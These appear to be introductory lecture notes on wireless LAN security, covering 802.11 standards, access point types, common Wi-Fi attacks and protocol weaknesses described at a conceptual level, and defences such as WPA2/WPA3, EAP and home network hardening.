Wireless Network Security Lecture Notes

Wireless Local Area Networks (WLAN)

  • Definition: A Wireless Local Area Network (WLAN), commonly known as Wi-Fi, is a network designed to supplement or replace traditional wired Local Area Networks.
  • Functionality: WLANs provide wireless connectivity to portable endpoint devices such as tablets, smartphones, and laptops, provided they are within the transmission range of an Access Point (AP).
  • IEEE 802.11 Standards History:
    • Initial Release: The Institute of Electrical and Electronics Engineers (IEEE) released the first 802.11 standard for WLANs in 1997.
    • Evolution: The standard has undergone multiple amendments and ratifications to support increased data transfer speeds and larger data sizes.
    • Version Iterations: Key versions include IEEE 802.11b, 802.11a, 802.11g, 802.11n, 802.11ac, and 802.11ax.
  • Wi-Fi 6 (IEEE 802.11ax):
    • This is the latest ratified version of the standard.
    • Performance: Supports data transfer speeds reaching up to 9.6Gbps9.6\,Gbps.
    • Spectrum Usage: Utilizes multiple frequency bands, including 2.4GHz2.4\,GHz, 5GHz5\,GHz, and the 16GHz1-6\,GHz range.

WLAN Hardware Components

To achieve full WLAN functionality, two primary hardware components are required beyond standard networking devices:

  • Wireless Client Network Interface Card (Wireless Adapter):
    • Installed on endpoint devices (clients).
    • Performs functions similar to a wired NIC but utilizes an antenna to send and receive signals via airwaves rather than physical cables.
  • Access Point (AP):
    • Role: Acts as a central connection point for wireless endpoints.
    • Components: Primarily comprised of an antenna and a radio transmitter/receiver.
    • Bridging Function: Serves as a bridge between wireless and wired networks by connecting to the wired infrastructure via a physical cable.

Types of Access Points (APs)

  • Small Office Home Office (SOHOs):
    • Typically uses a single "wireless router."
    • Multifunctionality: Combines the roles of an AP, gateway, switch, DHCP server, and firewall into one device.
  • Enterprise Access Points:
    • Captive Portal APs: Common in public venues (airports, hotels, malls). They redirect users to a web page for password entry and acceptance of terms of use before granting access.
    • Standalone (Autonomous) APs: These are independent devices separate from other network infrastructure. They are autonomous, meaning they do not rely on a central controller for basic operations.
    • Fat APs: These contain all the internal hardware and software logic required to manage wireless authentication, encryption, and other functions locally. Managing multiple Fat APs individually in large environments is complex.
    • Thin APs: These are "lightweight" devices. They lack complex internal management logic and are instead centrally configured and managed through the switch to which they are connected. This central approach improves security by ensuring no individual AP is overlooked during configuration.
    • Controller APs: These are managed via a dedicated device called a Wireless LAN Controller (WLC). The WLC handles authentication, allowing for minimal handoff time as a user roams from the coverage area of one AP to another.

Network Boundaries: Hard Edge vs. Blurred Edge

  • Hard Edge (Wired Networks):
    • Network Hard Edge: In a wired network, a well-defined boundary exists because data typically passes through a single, controllable point.
    • Physical Hard Edge: Comprised of physical barriers like walls and buildings that restrict unauthorized physical access to network hardware.
  • Blurred Edge (Wireless Networks):
    • Introduction of WLANs creates multiple entry points into the network.
    • Because radio signals can penetrate walls, attackers can connect to the network from outside the physical building, effectively blurring the defensive perimeter.

Wireless Network Attacks

  • Rogue Access Point: An unauthorized AP set up within a network, often by an employee (insider) for convenience (e.g., better signal). Because these are often connected behind the corporate firewall, they open a backdoor for attackers to bypass security configurations.
  • Evil Twin: An AP set up by an attacker to mimic a legitimate authorized AP. It uses a similar or identical Service Set Identifier (SSID) to trick users into connecting. Once connected, the attacker can capture all user transmissions.
  • Intercepting Wireless Data: Attackers use WLAN equipment to pick up RF signals from open or misconfigured APs. This allows them to read data and gather intelligence about the wired enterprise network.
  • Wireless Denial of Service (DoS):
    • RF Jamming: The use of intentional RF interference to flood the frequency spectrum, preventing legitimate devices from communicating with the AP.
    • Disassociation Attack: An attacker spoofs a trusted client's MAC address and creates a fictitious frame to disassociate that client from the WLAN. Continuous spoofing prevents the client from re-establishing a connection.
    • Duration Field Manipulation: Attackers manipulate the value in the duration field used by the Request to Send/Clear to Send (RTS/CTS) protocol. By setting a very high value, they reserve the medium for an extended period, preventing other devices from transmitting.
  • Wireless Consumer Attacks: Occur when home users fail to secure their networks. Potential consequences include data theft (via file sharing), credential harvesting (passwords, credit cards), malware injection, or the downloading of illegal/harmful content.

Wireless LAN Vulnerabilities

  • Wired Equivalent Privacy (WEP):
    • An early IEEE 802.11 security protocol intended to provide confidentiality comparable to a wired network.
    • Encryption: Uses a shared secret key (6464-bit or 128128-bit).
    • Initialization Vector (IV): A 2424-bit value changed per message and sent as plaintext with the ciphertext.
    • Flaw: The IV is too short (224=16,777,2162^{24} = 16,777,216 possible values). On a busy AP, IVs repeat quickly, allowing attackers to detect patterns and crack the secret key.
  • Wi-Fi Protected Access (WPA):
    • Introduced to fix WEP's flaws without requiring new hardware.
    • Modes: Personal (SOHO) and Enterprise.
    • Authentication: Uses a Pre-Shared Key (PSK). Often, users use the WLAN passphrase as the PSK, which is insecure.
  • Wi-Fi Protected Setup (WPS):
    • A feature designed for easy connection via a physical button or a PIN (often found on a sticker).
    • Flaw: It does not mandate a lockout limit for PIN attempts, making it susceptible to brute-force attacks.
  • MAC Address Filtering:
    • Used to permit or block specific hardware addresses.
    • Flaw: MAC addresses are exchanged in an unencrypted format, allowing attackers to find an approved address and spoof it. Furthermore, it is difficult to manage at scale in large enterprises.

Modern Security Solutions: WPA2 and WPA3

  • Wi-Fi Protected Access 2 (WPA2):
    • Uses advanced encryption protocols for data integrity and authentication.
    • WPA2 Enterprise Mode: Blocks all traffic until the client provides valid credentials verified by an authentication server (e.g., using a university ID and password).
  • Extensible Authentication Protocol (EAP):
    • A framework used to secure communication between the supplicant, authenticator, and server.
    • Packet Types: Request (from authenticator), Response (from supplicant), Success (from server), and Failure (from server).
    • Authentication Process (6 Steps):
      1. Supplicant (client) asks to join the network.
      2. Authenticator (AP) asks supplicant to verify identity.
      3. Supplicant sends identity to the authenticator.
      4. Authenticator passes the identity to the Authentication Server.
      5. Authentication Server verifies the identity.
      6. Supplicant is approved to join the network.
  • Wi-Fi Protected Access 3 (WPA3):
    • Simultaneous Authentication of Equals (SAE): Enhances security during the initial key-exchange handshake.
    • Encryption: Supports a robust 192192-bit encryption.
    • Public/Open Wi-Fi Protection: Every connection between a client and AP is encrypted with a unique key, mitigating Man-In-The-Middle (MITM) attacks in public spaces.

Additional Wireless Security Protections

  • Installation Best Practices:
    • Location should ensure adequate coverage and bandwidth for all users while minimizing signal "bleed" outside the building walls.
    • Site Survey Tools: Use heat maps, Wi-Fi analyzers, and channel overlays to optimize placement.
    • Optimal Placement: APs should be centrally located in the coverage area and mounted high to prevent obstruction by human bodies and to discourage theft.
  • Configuration Best Practices:
    • Signal Tuning: Reduce signal strength to limit reach outside intended areas. Adjust frequency band, channel selection, and channel width to avoid interference.
    • Home Network Hardening:
      • Change default administrator passwords for the router.
      • Use a strong passphrase for device authentication.
      • Select modern encryption (e.g., WPA2/WPA3).
      • Change the default SSID to something that does not reveal the router model or the owner's identity.
      • Create separate Guest Networks to isolate visitors/attackers from primary devices.
      • VPNs: Highly recommended when using public wireless networks to ensure all traffic is encrypted regardless of the AP's security level.